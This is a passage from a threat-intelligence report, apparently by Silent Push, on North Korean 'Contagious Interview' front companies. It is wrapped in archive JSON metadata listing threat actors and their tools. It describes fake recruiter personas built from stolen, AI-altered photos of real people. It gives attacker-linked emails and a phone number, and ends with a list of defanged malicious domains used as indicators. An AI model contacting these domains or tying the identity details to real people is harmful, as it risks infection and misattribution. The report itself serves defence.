and thegoodearth918 including\r\ntsumin.work@gmail[.]com\r\nBlockNovas Recruiter Alexander Nolan: A Known Fake\r\nWe found a site, “crypto[.]jobs,” mentioning BlockNovas LLC with a recruiter named Alexander Nolan.\r\nhxxps://crypto[.]jobs/companies/blocknovas-llc-1\r\nThe same profile can be seen on intch[.]org:\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 66 of 71\n\nFake persona of Alexander Nolan on intch[.]org/14338697\r\nOur threat analysts believe “Alexander Nolan” is a fake persona impersonating the CEO of “TeachMe[.]To”\r\nnamed Tyler Maloney, who was interviewed by Business Insider in 2024 about his startup. The image in the\r\narticle is nearly identical to the one used on the recruiter pages.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 67 of 71\n\nWhat’s odd about this “Alexander Nolan” persona is that the images are slightly different—the first image below\r\nwas the image found on LinkedIn and used in the Business Insider article. The second image appears to be either\r\nfrom a unique source or an AI-generated image using the first as its base.\r\nReal image of Tyler Maloney found on Business Insider, LinkedIn\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 68 of 71\n\nImage used by Contagious Interview persona and BlockNovas recruiter of “Alexander Nolan”\r\n“Individual A”: Likely Fake BlockNovas Developer\r\n“Individual A” states that the account is run the Chief Technology Officer of BlockNovas. However, there is\r\nevidence that the photos have been generated using AI via Remaker[.]ai. Update: The screenshot and name\r\nconnecting the two has been removed for privacy reasons as the images were stolen from a real individual,\r\nthen altered using AI.\r\nWhen expanded, the individual’s LinkedIn profile says, “Remaker AI Headshot” in the bottom left corner of the\r\nimage, which refers to the software Remaker[.]ai.\r\nRemaker AI is a tool that enables you to upload one photo or a series of photos of a real person and generate an\r\nunlimited number of AI-generated photos of that persona in a wide range of scenarios.\r\nUsing the tool aligns with questions we had about a similar face seen repeatedly with the “Mehmet Demir”\r\npersona in different scenarios—the same tool or a similar tool was likely used to create the images.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 69 of 71\n\nAI-generated image examples on remaker[.]ai\r\n“Individual A” also created a CV on the site vercel[.]app, which is commonly used by North Korean APTs to set\r\nup fake resumes for the personas they use to conduct their sophisticated campaigns. The site revealed an email\r\naddress “gabriel.dev9725@gmail[.]com” and phone number +558195833202. Update: The screenshot\r\nconnecting the two has been removed for privacy reasons as the images were stolen from a real individual.\r\nSilent Push Threat Analysts found a recent post from Lima on LinkedIn and noticed something was off about the\r\npicture. In this instance, Lima looks different in the post compared to the CV and LinkedIn profile picture. The\r\nhands also look off. Update: The screenshot connecting the two has been removed for privacy reasons as the\r\nimages were stolen from a real individual, then altered using AI.\r\nContinuing to Track North Korean Threat Actors “Contagious Interview”\r\nCampaigns\r\nSilent Push Threat Analysts are continuing to track the Contagious Interview threat actors. We believe they pose a\r\nthreat to individuals and provide some corporate risk due to the malware they deploy and the credentials they\r\nacquire from devices.\r\nMitigation\r\nOur analysts have developed a series of Silent Push Indicators Of Future AttackTM (IOFA\r\nTM) Feeds for these\r\ntypes of malicious campaign efforts.\r\nSilent Push IOFA\r\nTM Feeds are available as part of an Enterprise subscription. As a result, enterprise users can\r\ningest IOFA\r\nTM Feed data into their security stack to inform their detection protocols or use it to pivot across\r\nattacker infrastructure using the Silent Push Console and Feed Analytics screen.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 70 of 71\n\nSilent Push Community Edition is a free threat-hunting and cyber defense platform featuring a range of advanced\r\noffensive and defensive lookups, web content queries, and enriched data types, including Silent Push Web Scanner\r\nand Live Scan.\r\nClick here to sign up for a free account.\r\nSample Contagious Interview IOFA\r\nTM List\r\nangeloper[.]com\r\nangeloperonline[.]online\r\napply-blocknovas[.]site\r\nattisscmo[.]com\r\nbigrocks918[.]com\r\nblocknovas[.]com\r\ncamdriversupport[.]com\r\ndrive-release[.]cloud\r\neasydriver[.]cloud\r\ninsomnianwin[.]site\r\nlianxinxiao[.]com\r\nSoftglide[.]co\r\nwonthegame[.]site\r\nxn--12c5eglc5bd7i[.]site\r\nSource: https://www.silentpush.com/blog/contagious-interview-front-companies/\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 71 of 71", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.silentpush.com/blog/contagious-interview-front-companies/" ], "report_names": [ "contagious-interview-front-companies" ], "threat_actors": [ { "id": "8670f370-1865-4264-9a1b-0dfe7617c329", "created_at": "2022-10-25T16:07:23.69953Z", "updated_at": "2026-04-10T02:00:04.716126Z", "deleted_at": null, "main_name": "Hades", "aliases": [ "Operation TrickyMouse" ], "source_name": "ETDA:Hades", "tools": [ "Brave Prince", "Gold Dragon", "GoldDragon", "Lovexxx", "Olympic Destroyer", "Running RAT", "RunningRAT", "SOURGRAPE", "running_rat" ], "source_id": "ETDA", "reports": null }, { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "7187a642-699d-44b2-9c69-498c80bce81f", "created_at": "2025-08-07T02:03:25.105688Z", "updated_at": "2026-04-10T02:00:03.78394Z", "deleted_at": null, "main_name": "NICKEL TAPESTRY", "aliases": [ "CL-STA-0237 ", "CL-STA-0241 ", "DPRK IT Workers", "Famous Chollima ", "Jasper Sleet Microsoft", "Purpledelta Recorded Future", "Storm-0287 ", "UNC5267 ", "Wagemole " ], "source_name": "Secureworks:NICKEL TAPESTRY", "tools": [], "source_id": "Secureworks", "reports": null }, { "id": "4fc99d9b-9b66-4516-b0db-520fbef049ed", "created_at": "2025-10-29T02:00:51.949631Z", "updated_at": "2026-04-10T02:00:05.346203Z", "deleted_at": null, "main_name": "Contagious Interview", "aliases": [ "Contagious Interview", "DeceptiveDevelopment", "Gwisin Gang", "Tenacious Pungsan", "DEV#POPPER", "PurpleBravo", "TAG-121" ], "source_name": "MITRE:Contagious Interview", "tools": [ "InvisibleFerret", "BeaverTail", "XORIndex Loader", "HexEval Loader" ], "source_id": "MITRE", "reports": null }, { "id": "d05e8567-9517-4bd8-a952-5e8d66f68923", "created_at": "2024-11-13T13:15:31.114471Z", "updated_at": "2026-04-10T02:00:03.761535Z", "deleted_at": null, "main_name": "WageMole", "aliases": [ "Void Dokkaebi", "WaterPlum", "PurpleBravo", "Famous Chollima", "UNC5267", "Wagemole", "Nickel Tapestry", "Storm-1877" ], "source_name": "MISPGALAXY:WageMole", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434062, "ts_updated_at": 1775826769, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/0584b033a3b4ad06fdf8a1b26249314ffda17a60.pdf", "text": "https://archive.orkl.eu/0584b033a3b4ad06fdf8a1b26249314ffda17a60.txt", "img": "https://archive.orkl.eu/0584b033a3b4ad06fdf8a1b26249314ffda17a60.jpg" } }